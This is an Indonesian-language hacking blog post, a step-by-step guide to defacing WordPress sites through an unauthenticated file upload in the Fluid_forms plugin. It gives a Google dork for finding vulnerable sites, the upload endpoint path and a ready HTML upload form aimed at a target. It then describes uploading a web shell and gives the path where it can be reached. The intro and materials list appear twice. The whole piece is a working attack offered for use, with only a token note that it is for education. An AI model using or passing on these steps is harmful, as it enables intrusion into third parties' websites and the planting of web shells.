Deface Metode Fluid_Forms Upload Vulnerability Wordpress - Balik Lagi Bersama saya,
untuk artikel hari ini saya akan share Exploit WordPress Fluid_forms Upload Vulnerability. ini exploit dah agak lama sih, Tapi Dari pada ga upload artikel yakan
ini Exploit Masih satu Sekutu sama FormCraft gan, Mungkin Untuk Selanjutnya gue bakal upload Deface Metode FromCraft Wordpress.
Oke Next Langsung aja gan.
Bahan Yang Diperlukan Tak lain tak bukan ialah :
1. Dork
2. Internet
3. Laptop/Hp
4. Kopi + Rokok
DORK Fluid_forms Upload Vulnerability :
*ganti target.co.ly -> url web target anda
* save as: .html
untuk artikel hari ini saya akan share Exploit WordPress Fluid_forms Upload Vulnerability. ini exploit dah agak lama sih, Tapi Dari pada ga upload artikel yakan
ini Exploit Masih satu Sekutu sama FormCraft gan, Mungkin Untuk Selanjutnya gue bakal upload Deface Metode FromCraft Wordpress.
Oke Next Langsung aja gan.
Bahan Yang Diperlukan Tak lain tak bukan ialah :
1. Dork
2. Internet
3. Laptop/Hp
4. Kopi + Rokok
DORK Fluid_forms Upload Vulnerability :
inurl:fluid_formsExploit:
/wp-content/plugins/fluid_forms/file-upload/server/php/
1. Masukan Dork ke kotak pencarian Google
2. Pilih target, lalu masukan Exploit.
contoh:
target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/
CSRF :
<form method="POST" action="http://target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
*ganti target.co.ly -> url web target anda
* save as: .html
3. Jika sudah buka file csrf dgn web browser anda, lalu Upload file/shell yang ingin kalian Upload ke web target
4. File/Shell anda berhasil terUpload ke web target
5. Shell Akses Anda :
/wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.phpJika Sudah Ter-upload Disarankan untuk menitip file saja, jangan disalahgunakan cukup menjadi edukasi untuk anda dan yang lain. sekian tutorial saya semoga bermanfaat untuk kalian semua